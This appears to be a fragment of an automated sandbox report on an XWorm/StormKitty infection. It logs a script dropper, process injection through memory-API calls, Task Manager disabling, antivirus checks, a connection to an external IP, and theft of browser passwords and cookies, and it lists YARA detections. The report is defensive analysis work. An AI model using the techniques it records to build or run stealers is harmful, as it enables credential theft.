Source: tmp5F83.tmp.dat.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: global block list test formVMware20,11696494690
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: wscript.exe, 00000003.00000003.1507105229.000001EF34FA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\Ph
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: wscript.exe, 00000003.00000002.1509798308.000001EF37E8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD04&
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: GeUT.exe.3.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 192.210.215.11 80 Jump to behavior
.NET source code references suspicious native API functions
Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, reflect.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, reflect.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, reflect.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 340000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 790000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 3D0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 1B0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Contains functionality to disable the Task Manager (.Net Source)
Source: GeUT.exe.3.dr, Program.cs .Net Code: TaskMan
Source: 3.2.wscript.exe.1ef379d70e0.1.raw.unpack, Program.cs .Net Code: TaskMan
Source: 3.3.wscript.exe.1ef34fd67e0.0.raw.unpack, Program.cs .Net Code: TaskMan
Source: Service.exe.4.dr, Program.cs .Net Code: TaskMan
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected BrowserPasswordDump
Source: Yara match File source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
Yara detected StormKitty Stealer
Source: Yara match File source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 6884, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 5664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Service.exe PID: 2668, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected BrowserPasswordDump
Source: Yara match File source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
Yara detected StormKitty Stealer
Source: Yara match File source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPE
